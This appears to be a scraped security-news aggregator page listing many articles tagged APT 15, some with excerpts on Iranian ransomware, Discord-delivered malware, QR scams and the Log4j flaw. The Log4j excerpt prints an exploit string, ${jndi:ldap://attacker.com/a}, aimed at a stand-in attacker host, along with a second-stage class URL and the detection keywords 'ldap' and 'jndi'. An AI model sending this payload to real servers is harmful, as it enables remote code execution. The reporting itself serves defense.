2022-06-27T15:01:06+00:00 https://www.silicon.fr/rachat-vmware-broadcom-cigref-alerte-442283.html www.secnews.physaphae.fr/article.php?IdArticle=5486507 False None APT 15 None

[Anomali - Firm Blog] Anomali Cyber Watch: Costa Rica in Ransomware Emergency, Charming Kitten Spy and Ransom, Saitama Backdoor Hides by Sleeping, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
COBALT MIRAGE Conducts Ransomware Operations in U.S. (published: May 12, 2022)
Secureworks researchers describe campaigns by the Iran-sponsored group Cobalt Mirage. These actors are likely part of a larger group, Charming Kitten (Phosphorus, APT35, Cobalt Illusion). In 2022, Cobalt Mirage deployed BitLocker ransomware on a US charity's systems and exfiltrated data from a US local government network. Their ransomware operations appear to be a low-scale, hands-on approach with rare tactics such as sending a ransom note to a local printer. The group utilized its own custom binaries, including a Fast Reverse Proxy client (FRPC) written in Go. It also relied on mass scanning for known vulnerabilities (ProxyShell, Log4Shell) and on commodity tools for encryption, internal scanning, and lateral movement.
Analyst Comment: However small your government or NGO organization is, it still needs protection from advanced cyber actors. Keep your systems updated, and employ mitigation strategies when updates for critical vulnerabilities are not available.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Cobalt Mirage, Phosphorous, Cobalt Illusion, TunnelVision, Impacket, wmiexec, Softperfect network scanner, LSASS, RDP, Powershell, BitLocker, Ransomware, Fast Reverse Proxy client, FRP, FRPC, Iran, source-country:IR, USA, target-country:US, Cyberespionage, Government, APT, Go, Log4j2, ProxyShell, CVE-2021-34473, CVE-2021-45046, CVE-2021-44228, CVE-2020-12812, CVE-2021-31207, CVE-2018-13379, CVE-2021-34523, CVE-2019-5591
SYK Crypter Distributing Malware Families Via Discord (published: May 12, 2022)
Morphisec researchers discovered a new campaign abusing the popular messaging platform Discord's content distribution network (CDN). If a targeted user activates the phishing attachment, it starts the DNetLoader malware, which reaches out to the hardcoded Discord CDN link and downloads a next-stage crypter such as the newly-discovered SYK crypter. SYK crypter is loaded into memory, where it decrypts its configuration and the next-stage payload using hardcoded keys and various encryption methods.
It detects and impairs antivirus solutions and checks for d
2022-05-17T15:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-costa-rica-in-ransomware-emergency-charming-kitten-spy-and-ransom-saitama-backdoor-hides-by-sleeping-and-more www.secnews.physaphae.fr/article.php?IdArticle=4668209 False Ransomware,Malware,Tool,Vulnerability,Threat,Conference APT 35,APT 15,APT 34 None

[Security Affairs - Security blog] Iran-linked COBALT MIRAGE group uses ransomware in its operations
2022-05-13T06:52:53+00:00 https://securityaffairs.co/wordpress/131218/apt/iran-cobalt-mirage-ransomware-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=4589476 False Ransomware,Threat APT 15,APT 15 4.0000000000000000

[The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?)] Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks
2022-05-12T06:56:45+00:00 https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html www.secnews.physaphae.fr/article.php?IdArticle=4583977 False Ransomware,Malware,Threat,Conference APT 35,APT 15 4.0000000000000000

[SecureWork - SecureWork: incident response] COBALT MIRAGE Conducts Ransomware Operations in U.S.
2022-05-12T00:00:00+00:00 https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us www.secnews.physaphae.fr/article.php?IdArticle=4593474 False Ransomware,Threat APT 15,APT 15 None

[Schneier on Security - American cryptographer] Corporate Involvement in International Cybersecurity Treaties
2022-05-06T11:01:16+00:00 https://www.schneier.com/blog/archives/2022/05/corporate-involvement-in-international-cybersecurity-treaties.html www.secnews.physaphae.fr/article.php?IdArticle=4554738 False None APT 15 None

[Korben - French blogger] Fig – A great companion for your macOS terminal
2022-03-11T08:00:00+00:00 https://korben.info/autocompletion-terminal-macos-fig.html www.secnews.physaphae.fr/article.php?IdArticle=4259191 False None APT 15 None

[Fortinet ThreatSignal - Hardware vendor] APT41 Compromised Six U.S. State Government Networks
2022-03-10T23:39:03+00:00 https://fortiguard.fortinet.com/threat-signal-report/4449 www.secnews.physaphae.fr/article.php?IdArticle=4258974 False Malware,Tool,Vulnerability,Threat,Guideline APT 15,APT 15,APT 41 None

[knowbe4 - cybersecurity services] CyberheistNews Vol 12 #07 [Heads Up] FBI Warns Against New Criminal QR Code Scams
CyberheistNews Vol 12 #07 | Feb. 15th, 2022
[Heads Up] FBI Warns Against New Criminal QR Code Scams
QR codes have been around for many years. While they were adopted for certain niche uses, they never did quite reach their full potential. They are a bit like Rick Astley in that regard: really popular for one song, but well after the boat had sailed. Do not get me wrong, Rick Astley achieved a lot. In recent years, he has become immortalized as a meme and Rick roller, but he could have been so much more.
However, in recent years, with lockdown and the drive to keep things at arm's length, QR codes have become an efficient way to facilitate contactless communications, or the transfer of offers without physically handing over a coupon. As this has grown in popularity, more people have become familiar with how to generate their own QR codes and how to use them as virtual business cards, discount codes, links to videos and all sorts of other things.
QRime Codes
As with most things, once they begin to gain a bit of popularity, criminals move in to see how they can manipulate the situation to their advantage. Recently, we have seen fake QR codes stuck to parking meters enticing unwitting drivers to scan the code and hand over their payment details, believing they were paying for parking, whereas they were actually handing over their payment information to criminals. The rise in QR code fraud resulted in the FBI releasing an advisory warning against fake QR codes that are being used to scam users. In many cases, a fake QR code will lead people to a website that looks like the intended legitimate site. So the usual verification process of checking the URL and any other red flags applies.
CONTINUED with links and 4 example malicious QR codes on the KnowBe4 blog: https://blog.knowbe4.com/qr-codes-in-the-time-of-cybercrime
2022-02-15T14:24:51+00:00 https://blog.knowbe4.com/cyberheistnews-vol-12-07-heads-up-fbi-warns-against-new-criminal-qr-code-scams www.secnews.physaphae.fr/article.php?IdArticle=4133418 False Ransomware,Data Breach,Spam,Malware,Threat,Guideline APT 43,APT 15 None

[Anomali - Firm Blog] Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the Common Vulnerability Scoring System (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users, and exploitation proof-of-concept code exists; LunaSec explains how it is exploited in five simple steps. These include:
1: Data from the user gets sent to the server (via any protocol).
2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server).
3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via the "Java Naming and Directory Interface" (JNDI).
4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process.
5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability; however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap" and "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021)
Researchers from the DevOps firm JFrog have found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1
2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 29,APT 25,APT 37,APT 15,APT 15 None

[Fortinet ThreatSignal - Hardware vendor] NICKEL - Targeting Organizations Across Europe, North America, and South America
2021-12-07T15:08:56+00:00 https://www.fortiguard.com/threat-signal-report/4330 www.secnews.physaphae.fr/article.php?IdArticle=3791016 False Malware,Patching,Guideline APT 25,APT 15 4.0000000000000000

[SecurityWeek - Security News] Microsoft Seizes Domains Used by China-Linked APT 'Nickel'
2021-12-07T13:04:42+00:00 https://www.securityweek.com/microsoft-seizes-domains-used-china-linked-apt-nickel www.secnews.physaphae.fr/article.php?IdArticle=3757112 False Threat APT 15 None

[IT Security Guru - Security blog] Dozens of malicious APT15 sites seized by Microsoft
2021-12-07T11:52:04+00:00
https://www.itsecurityguru.org/2021/12/07/dozens-of-malicious-apt15-sites-seized-by-microsoft/?utm_source=rss&utm_medium=rss&utm_campaign=dozens-of-malicious-apt15-sites-seized-by-microsoft www.secnews.physaphae.fr/article.php?IdArticle=3756579 False None APT 25,APT 15,APT 15 3.0000000000000000

[Security Affairs - Security blog] Microsoft seized 42 domains used by the China-linked APT15 cyberespionage group
2021-12-07T10:09:54+00:00 https://securityaffairs.co/wordpress/125365/apt/microsoft-seized-apt15-domains.html?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-seized-apt15-domains www.secnews.physaphae.fr/article.php?IdArticle=3756234 False None APT 25,APT 15 None

[The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?)] Microsoft Seizes 42 Malicious Web Domains Used By Chinese Hackers
2021-12-07T00:14:47+00:00 https://thehackernews.com/2021/12/microsoft-seizes-42-malicious-web.html www.secnews.physaphae.fr/article.php?IdArticle=3756061 False None APT 15 None

[Bleeping Computer - American magazine] Microsoft seizes sites used by APT15 Chinese state hackers
2021-12-06T16:53:08+00:00 https://www.bleepingcomputer.com/news/microsoft/microsoft-seizes-sites-used-by-apt15-chinese-state-hackers/ www.secnews.physaphae.fr/article.php?IdArticle=3754083 False None APT 15 None

[Wired Threat Level - Security News] Why Do People Make (and Watch) 5-Hour iCarly Analysis Videos?
2021-12-05T12:00:00+00:00 https://www.wired.com/story/youtube-5-hour-icarly-analysis-videos www.secnews.physaphae.fr/article.php?IdArticle=3748810 False None APT 15 None

[Anomali - Firm Blog] Anomali Cyber Watch: Azurescape Cloud Threat, MSHTML 0-Day in The Wild, Confluence Cloud Hacked to Mine Monero, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the "anomali cyber watch" tag.
Trending Cyber News and Threat Intelligence
S.O.V.A. – A New Android Banking Trojan with Fowl Intentions (published: September 10, 2021)
ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase, and the threat actor is publicly advertising S.O.V.A. for trial runs targeting banks to improve its functionality. The trojan's primary objective is to steal personally identifiable information (PII). This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookie theft, among others. The malware author is also working on other features on S.O.V.A.'s project roadmap, such as distributed denial-of-service (DDoS) and ransomware.
Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation.
MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle
Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances (published: September 9, 2021)
Unit 42 researchers identified and disclosed critical security issues in Microsoft's Container-as-a-Service (CaaS) offering, called Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers.
Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it is the first cross-account container takeover in the public cloud.
Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power. Microsoft patched ACI shortly after the discl
2021-09-14T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-azurescape-cloud-threat-mshtml-0-day-in-the-wild-confluence-cloud-hacked-to-mine-monero-and-more www.secnews.physaphae.fr/article.php?IdArticle=3369753 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Guideline Uber,APT 15,APT 41 None

[Bleeping Computer - American magazine] Microsoft releases first Windows 11 "Nickel" build to Insiders
2021-09-02T13:31:10+00:00 https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-first-windows-11-nickel-build-to-insiders/ www.secnews.physaphae.fr/article.php?IdArticle=3326599 False None APT 15 None

[01net. News - Security - French magazine] Beware: these fake Ledger wallets are designed to steal your cryptocurrency
2021-06-17T06:12:51+00:00 https://www.01net.com/actualites/attention-ces-faux-portefeuilles-ledger-sont-concus-pour-derober-votre-cryptomonnaie-2044630.html www.secnews.physaphae.fr/article.php?IdArticle=2947270 False None APT 15 None

[The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?)]
Passwordless: More Mirage Than Reality
2021-04-19T04:20:51+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/PBZrO95kqJ8/passwordless-more-mirage-than-reality.html www.secnews.physaphae.fr/article.php?IdArticle=2665676 False None APT 15,APT 15 None

[UnderNews - French "hacker" news site] Cybersecurity: the French fear for their online identity
2021-03-05T11:15:25+00:00 https://www.undernews.fr/reseau-securite/cybersecurite-les-francais-craignent-pour-leur-identite-en-ligne.html www.secnews.physaphae.fr/article.php?IdArticle=2438517 False None APT 15 None

[TroyHunt - Blog Security] Paramount+ will replace CBS All Access on March 4
2021-01-20T17:00:09+00:00 https://arstechnica.com/?p=1736298 www.secnews.physaphae.fr/article.php?IdArticle=2219869 False None APT 15 None

[CybeReason - Vendor blog] Ever Evolving: Katie Nickels on Incident Response in a Remote World
We spent some time with Katie Nickels - current Director of Intelligence at Red Canary and formerly MITRE ATT&CK Threat Intelligence Lead - to discuss applied threat intelligence, prioritizing threats for impact, and working incident response in remote environments - check it out...
2020-12-07T20:46:46+00:00 https://www.cybereason.com/blog/ever-evolving-katie-nickels-on-incident-response-in-a-remote-world www.secnews.physaphae.fr/article.php?IdArticle=2083469 False Threat,Guideline APT 15 None

[Bleeping Computer - American magazine] Researchers link APT15 hackers to Chinese military company
2020-07-02T12:11:14+00:00 https://www.bleepingcomputer.com/news/security/researchers-link-apt15-hackers-to-chinese-military-company/ www.secnews.physaphae.fr/article.php?IdArticle=1785712 False None APT 15 None

[ZD Net - IT magazine] Connection discovered between Chinese hacker group APT15 and defense contractor
2020-07-02T01:25:33+00:00
https://www.zdnet.com/article/connection-discovered-between-chinese-hacker-group-apt15-and-defense-contractor/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=1784728 False Malware APT 15 None

[RedTeam PL - DarkTrace: AI-based detection] Spear-phishing campaign tricks users to transfer money (TTPs & IOC)
2020-06-18T22:10:28+00:00 https://blog.redteam.pl/2020/06/spear-phishing-muhammad-appleseed1-mail-ru.html www.secnews.physaphae.fr/article.php?IdArticle=1798879 False Threat,Guideline APT 15 None

[Security Affairs - Security blog] Ke3chang hacking group adds new Ketrum malware to its arsenal
2020-05-28T07:51:22+00:00 https://securityaffairs.co/wordpress/103903/apt/ke3chang-group-ketrum-backdoor.html?utm_source=rss&utm_medium=rss&utm_campaign=ke3chang-group-ketrum-backdoor www.secnews.physaphae.fr/article.php?IdArticle=1737959 False Malware APT 25,APT 15 None

[Bleeping Computer - American magazine] Hacking group builds new Ketrum malware from recycled backdoors
2020-05-26T11:22:03+00:00 https://www.bleepingcomputer.com/news/security/hacking-group-builds-new-ketrum-malware-from-recycled-backdoors/ www.secnews.physaphae.fr/article.php?IdArticle=1735030 False Malware APT 25,APT 15 None

[NoticeBored - Experienced IT Security professional] NBlog Jan 22 - further lessons from Travelex
At the bottom of a Travelex update on their incident, I spotted this yesterday:
Customer Precautions
Based on the public attention this incident has received, individuals may try to take advantage of it and attempt some common e-mail or telephone scams. Increased awareness and vigilance are key to detecting and preventing this type of activity. As a precaution, if you receive a call from someone claiming to be from Travelex that you are not expecting or you are unsure about the identity of a caller, you should end the call and call back on 0345 872 7627. If you have any questions or believe you have received a suspicious e-mail or telephone call, please do not hesitate to contact us.
Although I am not personally aware of any such 'e-mail or telephone scams', Travelex would know better than me - and anyway, even if there have been no scams as yet, the warning makes sense: there is indeed a known risk of scammers exploiting major, well-publicised incidents such as this. We've seen it before, such as fake charity scams taking advantage of the public reaction to natural disasters such as the New Orleans floods, and - who knows - maybe the Australian bushfires.
At the same time, this infosec geek is idly wondering whether the Travelex warning message and web page are legitimate. It is conceivable that the cyber-criminals and hackers behind the ransomware incident may still have control of the Travelex domains, webservers and/or websites, perhaps all their corporate comms including the Travelex Twitter feeds and maybe even the switchboard behind that 0345 number. I'm waffling on about corporate identity theft, flowing on from the original incident.
I appreciate the scenario I'm postulating seems unlikely, but bear with me and my professional paranoia for a moment.
Let's explore the hypot]]> 2020-01-22T09:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/tIKSOS4dN4A/nblog-jan-22-further-lessons-from.html www.secnews.physaphae.fr/article.php?IdArticle=1503295 False Ransomware,Malware,Patching,Guideline APT 15 None Security Affairs - Blog Secu China-Linked APT15 group is using a previously undocumented backdoor 2019-07-24T03:07:00+00:00 https://securityaffairs.co/wordpress/88824/apt/apt15-okrum-backdoor.html www.secnews.physaphae.fr/article.php?IdArticle=1220700 True Threat APT 25,APT 15 None SecurityWeek - Security News China-Linked Threat Actor Using New Backdoor 2019-07-23T14:31:00+00:00 https://www.securityweek.com/china-linked-threat-actor-using-new-backdoor www.secnews.physaphae.fr/article.php?IdArticle=1220616 False Threat APT 15 None Malwarebytes Labs - MalwarebytesLabs A week in security (July 15 – 21) A roundup of cybersecurity news from July 15–21, including the Zoom camera vulnerability, Extenbro, Sodinokibi, Magecart, and cybersecurity challenges facing the education sector. Categories: A week in security Tags: (Read more...) ]]> 2019-07-22T15:50:03+00:00 https://blog.malwarebytes.com/a-week-in-security/2019/07/a-week-in-security-july-15-21/ www.secnews.physaphae.fr/article.php?IdArticle=1220089 False None APT 25,APT 15 None IT Security Guru - Blog Sécurité Malware that waits for three mouse clicks before running. 
2019-07-19T14:35:01+00:00 https://www.itsecurityguru.org/2019/07/19/malware-that-waits-for-three-mouse-clicks-before-running/ www.secnews.physaphae.fr/article.php?IdArticle=1214430 False Malware,Threat APT 25,APT 15 2.0000000000000000 We Live Security - Editeur Logiciel Antivirus ESET Okrum: Ke3chang group targets diplomatic missions Tracking the malicious activities of the elusive Ke3chang APT group, ESET researchers have discovered new versions of malware families linked to the group, and a previously unreported backdoor ]]> 2019-07-18T09:30:01+00:00 https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/ www.secnews.physaphae.fr/article.php?IdArticle=1212162 False Malware APT 25,APT 15 None Bleeping Computer - Magazine Américain New Okrum Malware Used by Ke3chang Group to Target Diplomats 2019-07-18T07:03:00+00:00 https://www.bleepingcomputer.com/news/security/new-okrum-malware-used-by-ke3chang-group-to-target-diplomats/ www.secnews.physaphae.fr/article.php?IdArticle=1212312 False Malware,Threat APT 25,APT 15 None Data Security Breach - Site de news Francais Equifax : le pirate à plus de 1,4 milliard de perte 2019-05-12T16:08:00+00:00 https://www.datasecuritybreach.fr/equifax-le-pirate-a-plus-de-14-milliard-de-perte/ www.secnews.physaphae.fr/article.php?IdArticle=1104143 False None APT 15,Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Ethical hacking as a post-graduation opportunity The world of cybersecurity is an ever-changing one of constant preemptive preparation, where companies are forced to hunt for any kinks in their defenses to ensure that they’re as protected as possible. Working as an ethical hacker allows information technology graduates to come into the job market and aid companies in finding those kinks so that they can remain safe in a world of increasing cybercrime. 
As the world of cybersecurity grows more linked with everyday life, it’s important to know what awaits those entering this job market. Great pay Ethical hacking is a skilled trade, reserved for those that know their way around design and programming. The average salary for ethical hacking offers a wide range - between $24,760 and $132,322. There are also many freelancing opportunities for one-time or part time positions, which can offer multiple opportunities and flexible pay. For graduates looking to deal with school loans or simply wishing to jumpstart their finances, the high ceiling of earning averages provides an excellent opportunity Rapid growth Ethical hacking is one of the swiftest growing areas for information technology graduates, if for no other reason than for demand. The increasingly connected internet of things is forcing companies to have a powerful online presence, which then needs to be defended. As more and more companies become connected to the internet, the need for ethical hackers to test their defenses increases as well. In fact, the United States Bureau of Labor Statistics expect to see information security analysts, a category which includes ethical hackers, to see job growth increase by as much as 28% from 2016 to 2026. This is four times the job growth that other sectors expect to see, which sits around 7%. The job growth for ethical hacking is due to the increased need for online security, and means that graduates entering the field can expect a surplus of available positions. Additionally, the constant growth of jobs equates to advanced job options, as graduates are likely to always be able to find another position if the need arises. Increasing skill sets Graduates are likely to have been focusing on one or two subjects while going through their collegiate career. Ethical hacking provides an excellent way to diversify the skills one has learned, as well as providing opportunities to grow in acclaim. 
Many ethical hacking positions may require brief training courses that will end with the ethical hacker being rewarded with certification and verification of skills. While often optional, this is highly recommended, as certified ethical hacking professionals earn significantly more than their non-certified peers. Ultimately, many experts believe ethical hacking to be one of the most prominent fields of information security analysis in the future. Ethical hac]]> 2019-04-18T13:00:00+00:00 https://feeds.feedblitz.com/~/600960344/0/alienvault-blogs~Ethical-hacking-as-a-postgraduation-opportunity www.secnews.physaphae.fr/article.php?IdArticle=1093967 False None APT 15 None Wired Threat Level - Security News This Guy Predicted Society\'s Thirst for Internet Fame-in 1999 2019-03-15T11:00:00+00:00 https://www.wired.com/story/josh-harris-social-media-totally-wired-excerpt www.secnews.physaphae.fr/article.php?IdArticle=1071005 False None APT 15 None Krebs on Security - Chercheur Américain “Stole $24 Million But Still Can\'t Keep a Friend” 2019-01-16T00:52:03+00:00 https://krebsonsecurity.com/2019/01/stole-24-million-but-still-cant-keep-a-friend/ www.secnews.physaphae.fr/article.php?IdArticle=994420 False None APT 15 None Zataz - Magazine Francais de secu Fuite de données corrigée pour Info Greffe Fuite de données corrigée pour Info Greffe est apparu en premier sur ZATAZ. 
]]> 2018-09-23T14:33:04+00:00 https://www.zataz.com/fuite-de-donnees-corrigee-pour-info-greffe/ www.secnews.physaphae.fr/article.php?IdArticle=821188 False None APT 15 None Krebs on Security - Chercheur Américain The Year Targeted Phishing Went Mainstream 2018-08-02T15:11:04+00:00 https://krebsonsecurity.com/2018/08/the-year-targeted-phishing-went-mainstream/ www.secnews.physaphae.fr/article.php?IdArticle=763823 False None APT 15 None TechRepublic - Security News US Google Chrome launches on Daydream headsets, could make enterprise VR training a reality 2018-07-31T14:03:05+00:00 https://www.techrepublic.com/article/google-chrome-launches-on-daydream-headsets-could-make-enterprise-vr-training-a-reality/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=760505 False None APT 15 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe APT15 Pokes Its Head Out With Upgraded MirageFox RAT 2018-06-19T21:58:03+00:00 https://threatpost.com/apt15-pokes-its-head-out-with-upgraded-miragefox-rat/132943/ www.secnews.physaphae.fr/article.php?IdArticle=713210 False None APT 15 None Security Affairs - Blog Secu China-Linked APT15 is still very active, experts found its new malware tracked as \'MirageFox\' 2018-06-18T12:41:02+00:00 https://securityaffairs.co/wordpress/73636/apt/apt15-miragefox-malware.html www.secnews.physaphae.fr/article.php?IdArticle=710278 False None APT 25,APT 15 None SecurityWeek - Security News China-Linked APT15 Develops New \'MirageFox\' Malware 2018-06-18T04:38:03+00:00 https://www.securityweek.com/china-linked-apt15-develops-new-miragefox-malware www.secnews.physaphae.fr/article.php?IdArticle=712098 False None APT 15 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Explain PGP Encryption: An Operational Introduction If you don’t already know what Pretty Good Privacy (PGP) is; you may have heard of PGP before, perhaps during a discussion on how to secure your communications, or perhaps in one of those 
how-to maintain privacy guides. PGP is a popular solution for encrypting, decrypting, signing, and verifying messages and files, often found in email communications and package repository identity verification (because security matters). Most generic guides simply explain PGP at a high-level or how to encrypt and decrypt messages using specific software, and not much more than that. The goal of this introduction to PGP is to illustrate a more timeless and operational approach to using PGP safely, with respect to both information security and operational security. Firstly, we introduce PGP theoretically and practically, this means understanding how PGP works and what we can actually do with PGP. To better understand our security stance, we assess the CIA Triad, a theoretical Information Security model, that considers the confidentiality, integrity, and availability of information. Next, we get familiar with our threat model (similar to OPSEC Model); in this step, we analyze personalized risks and threats. To mitigate any identified threats and reduce risk, we implement operational security practices. At a more concise glance, we will discuss the following: PGP, OpenPGP & GPG Public & Private Key Pairs Information Security (CIA Triad) Confidentiality: message encryption, information storage Integrity: message/file authenticity, web of trust Availability: key servers, web of trust, metadata Assessing Threats & Risk Threat Modeling Operational Security Clients & Use Guides: Windows, Linux, Mac, Web With that caveat in mind, let’s jump straight in. PGP, OpenPGP & GPG: What is it? PGP is a protocol used for encrypting, decrypting and signing messages or files using a key pair. PGP is primarily used for encrypting communications at the Application layer, typically used for one-on-one encrypted messaging. 
You may find yourself needing to use PGP if you want to be certain that only the intended receiver can access your private message, thwarting the efforts of intercepting parties, or if you just want to verify the sender’s identity. There are different variations of PGP: OpenPGP, PGP and GPG, but they generally all do the same thing. Here is the quick terminology run-down: PGP: Pretty Good Privacy, original proprietary protocol. Released in 1991. OpenPGP: Pretty Good Privacy, but it is an open-source version, and it has become the universally-accepted PGP standard. Released in 1997. GPG: GNU Privacy Guard, another popular solution that follows OpenPGP standards. Released in 1999. When someone says PGP, it is generally s]]> 2018-03-26T13:00:00+00:00 http://feeds.feedblitz.com/~/535192976/0/alienvault-blogs~Explain-PGP-Encryption-An-Operational-Introduction www.secnews.physaphae.fr/article.php?IdArticle=542673 False None APT 15 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe China-Linked APT15 Used Myriad of New Tools To Hack UK Government Contractor 2018-03-13T16:16:02+00:00 https://threatpost.com/china-linked-apt15-used-myriad-of-new-tools-to-hack-uk-government-contractor/130376/ www.secnews.physaphae.fr/article.php?IdArticle=510990 False None APT 15 None Security Affairs - Blog Secu China-Linked APT15 used new backdoors in attack against UK Government\'s service provider 2018-03-12T18:07:04+00:00 http://securityaffairs.co/wordpress/70140/hacking/apt15-uk-gov-contractor.html www.secnews.physaphae.fr/article.php?IdArticle=508870 False None APT 15 None